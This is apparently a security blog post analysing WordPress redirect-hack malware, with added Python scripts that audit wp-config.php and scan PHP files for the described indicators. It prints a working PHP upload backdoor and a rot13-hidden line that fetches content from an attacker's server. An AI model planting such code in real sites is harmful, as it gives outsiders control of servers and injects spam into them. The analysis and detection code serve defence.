
Analysis of WordPress malware redirect hack techniques

This post explains how the code behind the redirect hack works. In a redirect hack, a visitor to the site is sent to another, malicious site without their consent; many sites have been damaged by it recently.


First: hackers take over the administrative rights of WordPress

Hackers first take over a WordPress administrator account in one of the following ways:

● Repeated login attempts (brute force, automated by software) until an administrator password is found
● Exploiting vulnerabilities in plugins, themes, or WordPress core to obtain administrator privileges
● Exploiting deficiencies in the wp-config.php settings (for example, the authentication unique keys and salts left unset or still at their sample values)

Because the WordPress dashboard includes a file editor for themes and plugins, an attacker who holds administrator rights can use that editor to embed malicious code in the site's own files.
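The two wp-config.php weaknesses mentioned above (authentication keys and salts that were never set, and the dashboard file editor left enabled) can be checked mechanically. The following Python script is an added example written for this article, not code from the original page or from WordPress itself. It parses the define() lines of a wp-config.php, flags each of the eight key and salt constants that is missing, still set to the wp-config-sample.php placeholder text, short, or reused, and flags DISALLOW_FILE_EDIT not being true (that constant is what removes the theme and plugin editor from the dashboard). The weak and hardened configuration samples are constructed for the demonstration; the minimum length of 32 characters is an assumption chosen here.

```python
import re
import secrets

# The eight authentication keys and salts that wp-config.php is expected to define.
WP_KEYS = (
    "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
    "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT",
)
# Default value shipped in wp-config-sample.php; if it is still there, the key was never set.
PLACEHOLDER = "put your unique phrase here"

# Matches define('NAME', value); and captures the constant name and the raw value text.
DEFINE_RE = re.compile(r"""define\(\s*['"]([A-Z_]+)['"]\s*,\s*(.+?)\s*\)\s*;""")


def parse_defines(src: str) -> dict:
    """Return {constant: value} for every define() in a wp-config.php source string."""
    defines = {}
    for name, raw in DEFINE_RE.findall(src):
        if len(raw) >= 2 and raw[0] in "'\"" and raw[-1] == raw[0]:
            raw = raw[1:-1]  # strip the quotes around string values; true/false stay as-is
        defines[name] = raw
    return defines


def audit_wp_config(src: str, min_key_len: int = 32) -> list:
    """List weaknesses in a wp-config.php: weak keys/salts and an enabled dashboard file editor."""
    defines = parse_defines(src)
    findings = []
    seen = set()
    for name in WP_KEYS:
        value = defines.get(name)
        if value is None:
            findings.append(f"{name}: not defined")
            continue
        if value == PLACEHOLDER:
            findings.append(f"{name}: still the wp-config-sample.php placeholder")
        elif len(value) < min_key_len:
            findings.append(f"{name}: too short ({len(value)} characters)")
        elif value in seen:
            findings.append(f"{name}: same value as another key")
        seen.add(value)
    # DISALLOW_FILE_EDIT true removes the theme/plugin editor that the article says attackers use.
    if defines.get("DISALLOW_FILE_EDIT", "").lower() != "true":
        findings.append("DISALLOW_FILE_EDIT: not set to true, dashboard file editor is enabled")
    return findings


# Constructed sample: a wp-config.php whose keys were never changed from the sample file.
WEAK_CONFIG = "<?php\ndefine('DB_NAME', 'wordpress');\n" + "".join(
    f"define('{k}', '{PLACEHOLDER}');\n" for k in WP_KEYS
) + "$table_prefix = 'wp_';\n"


def hardened_config() -> str:
    """Constructed sample: unique random keys and the dashboard editor disabled."""
    lines = ["<?php", "define('DB_NAME', 'wordpress');"]
    for k in WP_KEYS:
        # token_urlsafe(48) yields 64 URL-safe characters per key
        lines.append(f"define('{k}', '{secrets.token_urlsafe(48)}');")
    lines.append("define('DISALLOW_FILE_EDIT', true);")
    lines.append("$table_prefix = 'wp_';")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", hardened_config())):
        print(f"{label}: {audit_wp_config(cfg) or ['no findings']}")
```

Run it against a real installation by reading wp-config.php into a string and passing it to audit_wp_config(). The weak sample produces nine findings (eight placeholder keys plus the enabled editor); the hardened sample produces none.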

Tampering that redirects users to a different site whichever page they visit

To redirect every visitor regardless of which page they land on (for example, arriving from a search engine), hackers add the redirect code to a file that WordPress reads on every request.

The image above shows actual tamper code embedded in wp-config.php.

You can see that a file stored somewhere else on the server is read and executed by an @include statement. The leading @ suppresses PHP's error messages, so nothing is displayed even if the included file is missing. In many cases the malware code itself is obfuscated.

Setting up a file that lets anyone upload arbitrary files to the server

The redirect hacks that are popular these days always include a file with the following code on the server. It is either disguised as a plugin or placed in the wp-content folder under a file name such as wpcsesapps.php.

<?php
// Mode 1: store an uploaded file at a path chosen by the request (directory + original file name).
if (isset($_POST['upload'])){
	if ($_POST['upload']=='1'){
		$uploadfile = $_POST['path'].$_FILES['uploadfile']['name'];
		if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile))
			{echo 'ok';}
		else {echo $_FILES['uploadfile']['error'];}
		}
	// Mode 2: append request-supplied text to any writable file on the server.
	if ($_POST['upload']=='2'){
		$fp=fopen($_POST['path'],'a');  
		fwrite($fp, "\r\n");
		fwrite($fp, $_POST['uploadfile']);
		fclose($fp);
		echo 'ok';
		}
	}
// Any other visitor is silently redirected two directories up, so the file looks harmless.
else {header('Location: ../../');}

This is very dangerous code: it lets anyone on the outside upload an arbitrary file to the server (mode 1) or append arbitrary content to any writable file (mode 2). Such a file is called a backdoor, and it is the starting point for the hackers' alteration of the site. Removing the visible redirect code while leaving the backdoor in place only invites reinfection, so the cleanup must include finding and deleting this file.

Code that redirects to a malicious site from every link on the site's pages

There was also a case in which the user was redirected to another site the moment they clicked any link on any page of the site, achieved by embedding rogue JavaScript in the theme's footer.php file.

This code attaches a fake link target to every link on the site so that the click takes the user to another site. It is also quite clever: using a COOKIE, it remembers users who have already been redirected and stays inactive for them for a certain period, so that the redirect fires only once every few hours. This makes the symptom hard to reproduce; when investigating, clear the site's cookies or use a fresh private browsing window, otherwise the redirect may not trigger on a repeat visit.

SEO Hack

SEO hacks abuse the mechanism by which search engines rank a site higher the more links point to it. Links to the hackers' sites are embedded secretly in the compromised site so that the site owner does not notice.
To output these links, hackers embed the following tampering in the site's pages:

@file_get_contents(str_rot13("uggc://scrq8.bet/xxxxxxx"));

str_rot13 is only there to hide the address from a casual reader: it turns "uggc://" back into "http://", and the @ silences any error if the fetch fails. The code fetches a list of links for the SEO hack from a server owned by the hackers in real time and the result is output into your web pages. Because the list is fetched live, the hackers can change the URLs they want search engines to see whenever they like.
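The indicators described on this page (an @include in wp-config.php, an upload backdoor built on move_uploaded_file and fopen with request-controlled paths, a str_rot13-hidden URL passed to file_get_contents, and the wpcsesapps.php file name) can be turned into a simple file scanner. The following Python script is an added example written for this article; it is not the WordPress Doctor plugin's code or any code from the page. The PHP samples it scans are constructed to mirror the fragments shown above, with example.com standing in for the hackers' server, and the eval(base64_decode(...)) check is a generic obfuscation indicator added here, not one the page describes.

```python
import codecs
import re

# File name the article reports for the upload backdoor.
KNOWN_BACKDOOR_NAMES = {"wpcsesapps.php"}

# include/require statements, capturing whatever is included. A normal wp-config.php
# only requires wp-settings.php, so anything else included there is suspicious.
INCLUDE_RE = re.compile(r"@?\s*\b(?:include|require)(?:_once)?\b\s*\(?\s*([^;]+);")
# A request-controlled value anywhere in the file.
SUPERGLOBAL_RE = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[")
# fopen() whose path comes straight from the request.
FOPEN_REQUEST_RE = re.compile(r"fopen\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[")
# str_rot13() applied to a string literal, capturing the literal so it can be decoded.
ROT13_RE = re.compile(r"""str_rot13\s*\(\s*(['"])(.*?)\1\s*\)""")
# Generic obfuscation indicator (assumption added here, not from the article).
EVAL_DECODE_RE = re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")


def scan_php(path: str, src: str) -> list:
    """Return the list of indicators found in one PHP file."""
    findings = []
    base = path.rsplit("/", 1)[-1]
    if base in KNOWN_BACKDOOR_NAMES:
        findings.append("known backdoor file name")
    if base == "wp-config.php":
        for target in INCLUDE_RE.findall(src):
            if "wp-settings.php" not in target:
                findings.append(f"unexpected include in wp-config.php: {target.strip()}")
    if "move_uploaded_file(" in src and SUPERGLOBAL_RE.search(src):
        findings.append("file upload to a request-controlled path")
    if FOPEN_REQUEST_RE.search(src):
        findings.append("fopen() on a request-controlled path")
    for _quote, literal in ROT13_RE.findall(src):
        decoded = codecs.encode(literal, "rot_13")  # rot13 is its own inverse
        if decoded.startswith(("http://", "https://")):
            findings.append(f"rot13-hidden URL: {decoded}")
    if EVAL_DECODE_RE.search(src):
        findings.append("eval() of decoded payload")
    return findings


def scan_tree(files: dict) -> dict:
    """Scan {path: source} and keep only the files with at least one indicator."""
    result = {}
    for path, src in files.items():
        hits = scan_php(path, src)
        if hits:
            result[path] = hits
    return result


# Constructed samples modelled on the fragments shown in this article.
SAMPLES = {
    "wp-config.php": (
        "<?php\n"
        "@include '/tmp/.cache/.sess';\n"                 # hidden loader, as in the article's image
        "define('DB_NAME', 'wordpress');\n"
        "require_once ABSPATH . 'wp-settings.php';\n"    # legitimate line, must not be flagged
    ),
    "wp-content/wpcsesapps.php": (
        "<?php\n"
        "if (isset($_POST['upload'])){\n"
        "  if ($_POST['upload']=='1'){ $f = $_POST['path'].$_FILES['uploadfile']['name'];\n"
        "    move_uploaded_file($_FILES['uploadfile']['tmp_name'], $f); }\n"
        "  if ($_POST['upload']=='2'){ $fp=fopen($_POST['path'],'a'); fwrite($fp, $_POST['uploadfile']); fclose($fp); }\n"
        "}\n"
    ),
    "wp-content/themes/site/footer.php": (
        "<?php echo @file_get_contents(str_rot13(\"uggc://rknzcyr.pbz/yvaxf\")); ?>\n"
    ),
    "wp-content/plugins/hello/hello.php": (
        "<?php\nfunction hello_init() { return 'hello'; }\n"
    ),
}

if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLES).items():
        print(path)
        for hit in hits:
            print("  -", hit)
```

To scan a real installation, walk the document root with os.walk, read each .php file and pass its path and contents to scan_php(). The output is a list of indicators to review by hand, not a verdict: as the article notes, the malware is often obfuscated, so a file with no hits is not proof that it is clean, and a hit on a legitimate plugin that handles uploads needs a human look.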

How to detect redirect hack malware?

The WordPress Doctor Malware Scan & Security Plug-in can detect redirect hack malware.